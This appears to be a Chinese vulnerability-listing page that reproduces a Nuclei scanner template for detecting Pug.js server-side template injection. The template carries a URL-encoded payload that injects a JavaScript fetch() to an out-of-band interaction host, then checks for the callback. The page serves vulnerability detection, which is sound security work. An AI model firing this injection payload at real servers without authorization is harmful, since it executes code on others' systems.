pugjs-oob: Pug.js - Out of Band Template Injection

日期: 2025-08-01 | 影响软件: Pug.js | POC: 已公开

漏洞描述

PoC代码[已公开]

id: pugjs-oob

info:
  name: Pug.js - Out of Band Template Injection
  author: 0xAwali,DhiyaneshDK
  severity: high
  reference:
    - https://pugjs.org/
    - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
  metadata:
    verified: true
  tags: ssti,dast,oast,oob,vuln

variables:
  prefix: "{{rand_text_alpha(5)}}"

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      injection:
        - '%23%7Bfunction%28%29%7B%0A%20%20fetch%28%22http%3A%2F%2F{{interactsh-url}}%22%2C%20%7B%0A%20%20%20%20headers%3A%20%7B%0A%20%20%20%20%20%20%22{{prefix}}%22%3A%20%22application%2Fjson%22%0A%20%20%20%20%7D%0A%20%20%7D%29%0A%7D%28%29%7D'

    fuzzing:
      - part: query
        type: postfix
        mode: single
        fuzz:
          - "{{injection}}"

    matchers-condition: and
    matchers:
      - type: dsl
        name: request-matcher
        dsl:
          - "contains(interactsh_protocol,'http')"
          - "contains(to_lower(interactsh_request), to_lower(prefix))"
        condition: and
# digest: 4a0a004730450221009f8cd05de5f7a7e35c15a48aa0c15a307895a6fea3c9ae6f1d836d5c4e05bfc30220497660d1015cad3d86dba2c1490c69371d2cf1d7dd89b67ff13185818a4129ef:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssti/oob/pugjs-oob.yaml

相关漏洞推荐